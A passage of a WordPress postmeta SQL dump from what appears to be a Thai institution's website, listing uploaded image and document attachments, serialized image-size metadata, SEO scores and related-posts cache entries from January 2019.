(11157, 4955, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575744712;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5855;}i:1;a:1:{s:2:\"id\";i:4971;}i:2;a:1:{s:2:\"id\";i:4157;}}}}'),
(11158, 4978, '_wp_attached_file', '2019/01/สผ.งาน.doc'),
(11159, 4980, '_wp_attached_file', '2019/01/สผ.แผนก.doc'),
(11160, 4967, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575545017;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5200;}i:1;a:1:{s:2:\"id\";i:4718;}i:2;a:1:{s:2:\"id\";i:6141;}}}}'),
(11161, 4975, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575620388;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4967;}i:1;a:1:{s:2:\"id\";i:4887;}i:2;a:1:{s:2:\"id\";i:4863;}}}}'),
(11162, 4961, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575296291;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4033;}i:1;a:1:{s:2:\"id\";i:6074;}i:2;a:1:{s:2:\"id\";i:5388;}}}}'),
(11163, 4945, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575490208;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4701;}i:1;a:1:{s:2:\"id\";i:3954;}i:2;a:1:{s:2:\"id\";i:4632;}}}}'),
(11164, 4982, '_edit_lock', '1547000260:3'),
(11165, 4982, '_edit_last', '3'),
(11166, 4983, '_wp_attached_file', '2019/01/ประกาศ-ประกวดราคาซื้อครุภัณฑ์หุ่นยนต์เชื่อมพร้อมชุดเชื่อมชนิด-CMT-จำนวน-๑-ชุด.pdf'),
(11170, 4982, '_hide_featured', NULL),
(11171, 4982, '_yoast_wpseo_content_score', '60'),
(11172, 4982, '_yoast_wpseo_primary_category', '3'),
(11173, 4982, '_wpas_done_all', '1'),
(11174, 4986, '_edit_lock', '1547001787:3'),
(11175, 4986, '_edit_last', '3'),
(11176, 4989, '_wp_attached_file', '2019/01/48932566_2108539249166268_8409467273177202688_n.jpg'),
(11177, 4989, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:960;s:4:\"file\";s:59:\"2019/01/48932566_2108539249166268_8409467273177202688_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"48932566_2108539249166268_8409467273177202688_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"48932566_2108539249166268_8409467273177202688_n-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"48932566_2108539249166268_8409467273177202688_n-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11178, 4986, '_thumbnail_id', '4989'),
(11182, 4986, '_hide_featured', NULL),
(11183, 4986, '_yoast_wpseo_content_score', '30'),
(11184, 4986, '_yoast_wpseo_primary_category', '31'),
(11185, 4986, '_wpas_done_all', '1'),
(11186, 4863, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575330481;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4887;}i:1;a:1:{s:2:\"id\";i:4884;}i:2;a:1:{s:2:\"id\";i:4735;}}}}'),
(11187, 4991, '_edit_lock', '1547003220:3'),
(11188, 4982, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575726694;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5075;}i:1;a:1:{s:2:\"id\";i:4781;}i:2;a:1:{s:2:\"id\";i:4803;}}}}'),
(11189, 4986, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575696049;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4010;}i:1;a:1:{s:2:\"id\";i:4304;}i:2;a:1:{s:2:\"id\";i:4701;}}}}'),
(11190, 4991, '_edit_last', '3'),
(11191, 4992, '_wp_attached_file', '2019/01/49674100_739969716379219_7423576256437813248_o.jpg'),
(11192, 4992, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1188;s:6:\"height\";i:890;s:4:\"file\";s:58:\"2019/01/49674100_739969716379219_7423576256437813248_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"49674100_739969716379219_7423576256437813248_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"49674100_739969716379219_7423576256437813248_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"49674100_739969716379219_7423576256437813248_o-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"49674100_739969716379219_7423576256437813248_o-1024x767.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:767;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"49674100_739969716379219_7423576256437813248_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11193, 4991, '_thumbnail_id', '4992'),
(11197, 4991, '_hide_featured', NULL),
(11198, 4991, '_yoast_wpseo_content_score', '30'),
(11199, 4991, '_yoast_wpseo_primary_category', '31'),
(11200, 4991, '_wpas_done_all', '1'),
(11201, 4869, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575747073;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4701;}i:1;a:1:{s:2:\"id\";i:4160;}i:2;a:1:{s:2:\"id\";i:5026;}}}}'),
(11202, 4994, '_edit_lock', '1547014790:3'),
(11203, 4994, '_edit_last', '3'),
(11204, 4995, '_wp_attached_file', '2019/01/49864459_739983649711159_2133432129915191296_o.jpg'),
(11205, 4995, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2019/01/49864459_739983649711159_2133432129915191296_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"49864459_739983649711159_2133432129915191296_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"49864459_739983649711159_2133432129915191296_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"49864459_739983649711159_2133432129915191296_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"49864459_739983649711159_2133432129915191296_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"49864459_739983649711159_2133432129915191296_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11206, 4994, '_thumbnail_id', '4995'),
(11210, 4994, '_hide_featured', NULL),
(11211, 4994, '_yoast_wpseo_content_score', '30'),
(11212, 4994, '_yoast_wpseo_primary_category', '31'),
(11213, 4994, '_wpas_done_all', '1'),
(11214, 4866, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575688742;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5378;}i:1;a:1:{s:2:\"id\";i:5671;}i:2;a:1:{s:2:\"id\";i:6037;}}}}'),
(11215, 4994, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575296906;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5855;}i:1;a:1:{s:2:\"id\";i:6037;}i:2;a:1:{s:2:\"id\";i:6060;}}}}'),
(11218, 4991, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575739920;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4881;}i:1;a:1:{s:2:\"id\";i:4182;}i:2;a:1:{s:2:\"id\";i:4887;}}}}'),
(11219, 4934, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575267699;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4887;}i:1;a:1:{s:2:\"id\";i:4765;}i:2;a:1:{s:2:\"id\";i:4951;}}}}'),
(11220, 4937, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575669647;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4884;}i:1;a:1:{s:2:\"id\";i:4951;}i:2;a:1:{s:2:\"id\";i:4726;}}}}'),
(11221, 4998, '_edit_lock', '1547084987:3'),
(11222, 4998, '_edit_last', '3'),
(11223, 4999, '_wp_attached_file', '2019/01/49667130_740539042988953_677782380890554368_o.jpg'),
(11224, 4999, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1616;s:6:\"height\";i:1080;s:4:\"file\";s:57:\"2019/01/49667130_740539042988953_677782380890554368_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"49667130_740539042988953_677782380890554368_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"49667130_740539042988953_677782380890554368_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"49667130_740539042988953_677782380890554368_o-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"49667130_740539042988953_677782380890554368_o-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"49667130_740539042988953_677782380890554368_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11225, 4998, '_thumbnail_id', '4999'),
(11229, 4998, '_hide_featured', NULL),
(11230, 4998, '_yoast_wpseo_content_score', '30'),
(11231, 4998, '_yoast_wpseo_primary_category', '31'),
(11232, 4998, '_wpas_done_all', '1'),
(11233, 5002, '_wp_attached_file', '2019/01/10-1-2562-9-00-17.png'),
(11234, 5002, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:248;s:4:\"file\";s:29:\"2019/01/10-1-2562-9-00-17.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"10-1-2562-9-00-17-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11235, 5003, '_wp_attached_file', '2019/01/10-1-2562-9-01-10.png'),
(11236, 5003, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:606;s:6:\"height\";i:157;s:4:\"file\";s:29:\"2019/01/10-1-2562-9-01-10.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"10-1-2562-9-01-10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"10-1-2562-9-01-10-300x78.png\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"10-1-2562-9-01-10-400x104.png\";s:5:\"width\";i:400;s:6:\"height\";i:104;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11237, 1588, '_yoast_wpseo_content_score', '30'),
(11238, 5005, '_wp_attached_file', '2019/01/8-8-2561-11-39-38.jpg'),
(11239, 5005, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:238;s:6:\"height\";i:312;s:4:\"file\";s:29:\"2019/01/8-8-2561-11-39-38.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-8-2561-11-39-38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"8-8-2561-11-39-38-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-8-2561-11-39-38-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11240, 5006, '_wp_attached_file', '2019/01/9-7-2561-8-46-13.jpg'),
(11241, 5006, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:245;s:4:\"file\";s:28:\"2019/01/9-7-2561-8-46-13.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"9-7-2561-8-46-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11242, 5007, '_wp_attached_file', '2019/01/10-1-2562-9-16-47.png'),
(11243, 5007, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:605;s:6:\"height\";i:159;s:4:\"file\";s:29:\"2019/01/10-1-2562-9-16-47.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"10-1-2562-9-16-47-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"10-1-2562-9-16-47-300x79.png\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"10-1-2562-9-16-47-400x105.png\";s:5:\"width\";i:400;s:6:\"height\";i:105;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11244, 5008, '_wp_attached_file', '2019/01/10-1-2562-9-17-13.png'),
(11245, 5008, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:305;s:6:\"height\";i:325;s:4:\"file\";s:29:\"2019/01/10-1-2562-9-17-13.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"10-1-2562-9-17-13-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"10-1-2562-9-17-13-282x300.png\";s:5:\"width\";i:282;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"10-1-2562-9-17-13-282x300.png\";s:5:\"width\";i:282;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11246, 4998, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575651182;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5381;}i:1;a:1:{s:2:\"id\";i:6161;}i:2;a:1:{s:2:\"id\";i:4881;}}}}'),
(11247, 5012, '_wp_attached_file', '2019/01/201901111424.jpg'),
(11248, 5012, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:24:\"2019/01/201901111424.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"201901111424-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"201901111424-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"201901111424-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"201901111424-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"201901111424-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11249, 5017, '_edit_lock', '1547431664:3'),
(11250, 5017, '_edit_last', '3'),
(11251, 5018, '_wp_attached_file', '2019/01/49286284_741538692888988_6841380365584564224_o.jpg'),
(11252, 5018, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1616;s:6:\"height\";i:1080;s:4:\"file\";s:58:\"2019/01/49286284_741538692888988_6841380365584564224_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"49286284_741538692888988_6841380365584564224_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"49286284_741538692888988_6841380365584564224_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"49286284_741538692888988_6841380365584564224_o-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"49286284_741538692888988_6841380365584564224_o-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"49286284_741538692888988_6841380365584564224_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11253, 5017, '_thumbnail_id', '5018'),
(11257, 5017, '_hide_featured', NULL),
(11258, 5017, '_yoast_wpseo_content_score', '30'),
(11259, 5017, '_yoast_wpseo_primary_category', '31'),
(11260, 5017, '_wpas_done_all', '1'),
(11262, 5017, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575600725;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4160;}i:1;a:1:{s:2:\"id\";i:4166;}i:2;a:1:{s:2:\"id\";i:5324;}}}}'),
(11263, 5021, '_edit_lock', '1547450703:3'),
(11264, 5021, '_edit_last', '3'),
(11265, 5022, '_wp_attached_file', '2019/01/ประกาศ-รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว-ทำหน้าที่ธุรการ-จำนวน-4-อัตรา.pdf'),
(11269, 5021, '_hide_featured', NULL),
(11270, 5021, '_yoast_wpseo_content_score', '60'),
(11271, 5021, '_yoast_wpseo_primary_category', '3'),
(11272, 5021, '_wpas_done_all', '1'),
(11273, 5021, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575591210;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(11276, 5026, '_edit_lock', '1547538718:3'),
(11277, 5026, '_edit_last', '3'),
(11278, 5027, '_wp_attached_file', '2019/01/49948195_743465459362978_6523695756551913472_o.jpg'),
(11279, 5027, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/49948195_743465459362978_6523695756551913472_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"49948195_743465459362978_6523695756551913472_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"49948195_743465459362978_6523695756551913472_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"49948195_743465459362978_6523695756551913472_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"49948195_743465459362978_6523695756551913472_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"49948195_743465459362978_6523695756551913472_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
